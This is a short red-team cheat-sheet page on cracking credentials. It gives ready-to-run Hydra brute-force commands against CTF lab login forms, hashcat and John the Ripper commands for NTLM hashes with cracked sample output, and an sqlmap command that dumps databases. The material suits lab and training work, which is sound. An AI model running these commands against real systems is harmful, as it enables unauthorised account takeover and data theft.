CRD - Cracking Credentials

1.0 Tools

1.1 Hydra

Cracking Usernames

hydra -f -L /usr/share/wordlists/john.lst -p xxx a0c3aa0c1c148176b200f6cbda183aec.ctf.hacker101.com https-post-form "/login:username=^USER^&password=^PASS^:Invalid username"

Cracking Passwords

hydra -f -l melosa -P /home/kali/rockyou.txt a0c3aa0c1c148176b200f6cbda183aec.ctf.hacker101.com https-post-form "/login:username=^USER^&password=^PASS^:Invalid password"

2.0 Services

2.1 NTLM

2.1.1 hashcat

HashNumber

If you don’t know the hashnumber, use 2.1.2 John The Ripper

Crack a single Hash

hashcat -m 1000 831486ac7f26860c9e2f51ac91e1a07a /usr/share/wordlists/rockyou.txt
lisa.simpson:831486ac7f26860c9e2f51ac91e1a07a:sexywolfy

Crack a NTLM Hash-Dump

hashcat -m 1000 thesimpsons.domain.ntds /usr/share/wordlists/rockyou.txt --show --user
 
Guest:31d6cfe0d16ae931b73c59d7e0c089c0:
lisa.simpson:831486ac7f26860c9e2f51ac91e1a07a:sexywolfy
abe.simpson:84bbaa1c58b7f69d2192560a3f932129:iseedeadpeople
krustytheclown:cecd9141cf72794df40a2978afb62c9c:krustytheclown
barney.gumble:b8d76e56e9dac90539aff05e3ccb1755:iknownothing

2.1.2 John The Ripper

john hash.txt /usr/share/wordlists/rockyou.txt

Hint

To optimize speed, run:

john --test

2.2 SQL

2.2.1 SQLMap

sqlmap -u https://8156d6ee8b08475c1dc54a238fc70224.ctf.hacker101.com/login --method POST --data "username=FUZZ&password=" -p username --dbs --dbms mysql --regexp "Unknown user" --level 2 --dump --random-agent --threads 10

References

Red Team CheatSheet

hckhsn

Explorer

CRD - Cracking Credentials

CRD - Cracking Credentials

1.0 Tools

1.1 Hydra

Cracking Usernames

Cracking Passwords

2.0 Services

2.1 NTLM

2.1.1 hashcat

Crack a single Hash

Crack a NTLM Hash-Dump

2.1.2 John The Ripper

Hint

2.2 SQL

2.2.1 SQLMap

References

Graphansicht

Inhaltsverzeichnis

Backlinks